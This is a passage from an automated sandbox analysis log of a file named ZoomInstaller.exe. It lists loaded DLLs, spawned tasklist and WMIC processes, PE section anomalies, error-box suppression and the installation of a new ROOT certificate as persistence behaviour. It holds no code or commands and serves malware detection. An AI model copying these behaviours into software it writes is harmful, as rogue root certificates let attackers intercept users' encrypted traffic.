    Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: ZoomInstaller.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: ZoomInstaller.exeStatic PE information: Image base 0x140000000 > 0x60000000
    Source: ZoomInstaller.exeStatic file information: File size 22207488 > 1048576
    Source: ZoomInstaller.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3e6000
    Source: ZoomInstaller.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x30f000
    Source: ZoomInstaller.exeStatic PE information: Raw size of /19 is bigger than: 0x100000 < 0x4e8c00
    Source: ZoomInstaller.exeStatic PE information: Raw size of /45 is bigger than: 0x100000 < 0x203200
    Source: ZoomInstaller.exeStatic PE information: Raw size of /81 is bigger than: 0x100000 < 0x38fe00
    Source: ZoomInstaller.exeStatic PE information: Raw size of /92 is bigger than: 0x100000 < 0x112200
    Source: ZoomInstaller.exeStatic PE information: Raw size of /141 is bigger than: 0x100000 < 0x17ec00
    Source: ZoomInstaller.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: ZoomInstaller.exeStatic PE information: section name: .xdata
    Source: ZoomInstaller.exeStatic PE information: section name: /4
    Source: ZoomInstaller.exeStatic PE information: section name: /19
    Source: ZoomInstaller.exeStatic PE information: section name: /31
    Source: ZoomInstaller.exeStatic PE information: section name: /45
    Source: ZoomInstaller.exeStatic PE information: section name: /57
    Source: ZoomInstaller.exeStatic PE information: section name: /70
    Source: ZoomInstaller.exeStatic PE information: section name: /81
    Source: ZoomInstaller.exeStatic PE information: section name: /92
    Source: ZoomInstaller.exeStatic PE information: section name: /106
    Source: ZoomInstaller.exeStatic PE information: section name: /125
    Source: ZoomInstaller.exeStatic PE information: section name: /141
    Source: ZoomInstaller.exeStatic PE information: section name: /157
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD347600BD pushad ; iretd 17_2_00007FFD347600C1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFD347600BD pushad ; iretd 20_2_00007FFD347600C1

    Persistence and Installation Behavior

    barindex
    Installs new ROOT certificates
    Source: C:\Users\user\Desktop\ZoomInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
